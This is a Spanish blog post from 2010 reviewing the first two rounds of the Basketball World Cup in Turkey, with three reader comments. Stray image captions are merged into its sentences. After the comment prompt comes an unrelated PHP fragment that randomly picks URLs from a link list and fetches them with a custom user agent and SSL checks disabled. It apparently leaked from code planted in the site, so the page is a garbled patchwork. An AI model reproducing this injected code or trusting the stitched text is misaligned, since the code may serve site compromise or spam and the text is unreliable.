MundoBasket, jornadas 1 y 2

30 de August de 2010 por TheDeerHunter

Repasamos lo que han dado de sí las dos primeras jornadas del Mundobasket de Turquía, destacando a los NBA que lo disputan.

Grupo A: Máxima igualdad

No sabemos si por exceso de nivel… o por defecto. Argentina, no sin dificultades, se mantiene como única invicta delDelfino y Scola como referentes argentinos grupo. La dupla Scola-Delfino es medio equipo. 25,5 (3º) y 17 por partido respectivamente cuando en total han anotado 75 puntos por partido. Los serbios se dejaron inesperadamente levantar el partido contra Alemania. Consecuencia de las sanciones y también del buen rendimiento de Demond Greene y Jagla. Los teutones agradecen la wild card dando buenas sensaciones colectivas como ocurrió en el europeo. Harina de otro costal serán los cruces. Australia sufrió de lo lindo contra Jordania pero plantó cara de la buena a Argentina, con actuaciones intermitentes de David Andersen y Patrick Mills. En cambio Angola se llevó el baño del campeonato contra Serbia y ganó bien a los jordanos. Éstos no han inaugurado su casillero de victorias y van a tener difícil rascar algo en lo que queda.

Grupo B: Lo previsible

Durant es la estrella principal del equipo USAUSA no ha tenido ni para empezar contra dos de sus máximos rivales en el grupo. Sin mostrar apenas nada todavía ya hemos visto que, con poco más de 8 lanzamientos por partido, Durant desatasca lo que sea. Billups se está mostrando como uno de los mejores bases “fiba” que ha traido esta selección los últimos años y Kevin Love ha arrasado los tableros los pocos minutos que le han dejado disputar. Brasil también permanece imbatida, aunque los carioca se han enfrentado a Irán y Túnez sin oposición. Poco podemos decir de ellos más allá que Splitter y Barbosa están jugando bien. Croacia y Slovenia mostraron la esencia de sus vergüenzas contra los americanos. Son equipos un tanto timoratos e irregulares, pero también talentosos y peligrosos, a pinceladas. Dragic, Nachbar, Bogdanovic, Tomic… mimbres hay. En Irán hemos podido ver a Haddadi ponerse ciego a amasar números. En Túnez ni eso.

Grupo C: Grecia y Turkía

Grecia líder invicta, con un excelente Spanoulis ofreciendo clínic tras clínic pero su selección sufriendo partido tras partido. Los turcos empatados con el 2-0 con su gran base de NBAs pero con Turkoglu todavía buscándose a si mismo. Yianlian Yi posiblemente sea el MVP del campeonato hasta el momento. Se le ve fortísimo y seguro de sus Turkía hizo valer el hecho de jugar en casapropias posibilidades. Junto a Yao facilmente hubieran podido aspirar a una medalla… pero el resto lógicamente no están al nivel. Rusia se clasificará de la mano de Monya y Alexander Kaun. Puerto Rico está rayando a un gran nivel, con un excelente Barea y un gran Ramos. Estarán ahí ahí con los Chinos por la 4ª plaza. Costa de Marfil es la comparsa que esperábamos.

Grupo D: Sorpresa, sorpresa

La Lituania de Kleiza manda. España se dejó comer la tostada por la Francia de… ¿Gelabale? La Francia de Gelaballe y Batum sorprendió a EspañaEl equipo español estuvo falto de ideas,y horrendo en el tiro. Mención especial para los tiros libres.  Un 17 de 32 no es lo que se dice un buen porcentaje. A destacar los 2 de 8 de Felipe Reyes y los 2 de 6 de Marc. Si pensamos en ganar una hipotética final a los americanos pasando balones a los pivots, estos deben mejorar muchísimo sus porcentajes. Ricky parece que se asienta como base titular y eso es bueno. Lo ideal para llegar sin sobresaltos a la final sería quedar segundos y huele menos perder contra Francia que contra el Líbano, Canadá o Nueva Zelanda. Ojo que no estamos diciendo que se dejaron perder. Los campeones están jugando bastante mal, sobre todo en ataque. Tampoco será fácil cuadrar la segunda plaza. Cuidado con eso. Tiene toda la pinta que los canadienses serán la cuchara de manera del grupo. Entre el Líbano y Nueva Zelanda se tendrán que jugar la última plaza… los libaneses llevan una victoria, pero apuesto por los maoríes de la mano del bombardero Penney, que con 29 puntos por encuentro se está destacando en esta primera parte del campeonato. Y digo yo ¿ningún equipo español le ha echado el ojo a este elemento?

Seguiremos informando desde Turkía (ya nos gustaría a nosotros….)

Comenta

3 comentarios a esta entrada

  1. Love Denise dice:
    #1

    Discrepo en que si Ming jugara, China apiraría a medalla. El resto del equipo deja bastante que desear, y.. espera que Yi sea defendido por alguien en condiciones.
    Partidazo anoche el de Brasil vs Eeuu, a punto de hacer morder el polvo a los norteamericanos, los cuales, por primera vez, vi con pocos recursos en ataques, solo anotaron 9 puntos en el ultimo cuarto..y….le pitan uno de cada 4 pasos que cometen, en especial a Durant que esta siendo el niño mimado por los arbitros..

    el juego de España no me ha gustado de momento, creo que Marc ha estado lejos de su mejor versión en los primeros partidos, y jugadores del banquillo como Mumbru, Llull o Fran no han aportado mucho. A pesar de ganar de 17 a N Zelanda, a finales del 3er cuarto, éstos solo perdian de 9 (creo recordar un 77-68) , sin mencionar el traje que le hizo el Abercrombie a los pivots españoles, o los rebotes ofensivos de Vikuna (o algo así…) en el 3er cuarto… y eso que España tuvo un buen día en el triple, hasta Garbajosa hizo un 4 de 4 !!!, con menos acierto, podría haber ocurrido un partido tipo España vs reino Unido del 2009.

      Citar

  2. HeiNeKeN dice:
    #2

    Abercrombie durante sus primeros 14 minutos de juego (donde nos metio 18 puntos) parecia un all star de la NBA, que muelles tiene el colega y encima le salia todo (la jugada chocando contra Rudy en el aire es buenisima).

    Me gusta la filosofia de Costa de Marfil, saben que son el equipo mas debil del torneo y han ido a pasarselo bien, y dejando algunas jugadas muy bonitas, por poquito no han ganado a Rusia hoy.

      Citar

  3. Love Denise dice:
    #3

    y mis dudas se confirmaron, vaya partido se les ha escapado vs Lituania tras ir 61-43 a 4 min. de finalizar el 3er cuarto más o menos. Increible. Creo que no hay buena sintonia entre los jugadores y Scariolo, ni este año, ni el anterior, solo que la seleccion era el año pasado con pau tan superior que acabó apabullando, pero creo que los jugadores, o no le hacen ni pu.. caso al entrenador, o no se enteran de lo que Sergio les pide. Pero que te metan un parcial de 25-5 en 8 minutos, no es normal, hacerle ese parcial a algun equipo es complicadisimo..imaginate entonces a España, ni a los marfileños les hacen esos parciales.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>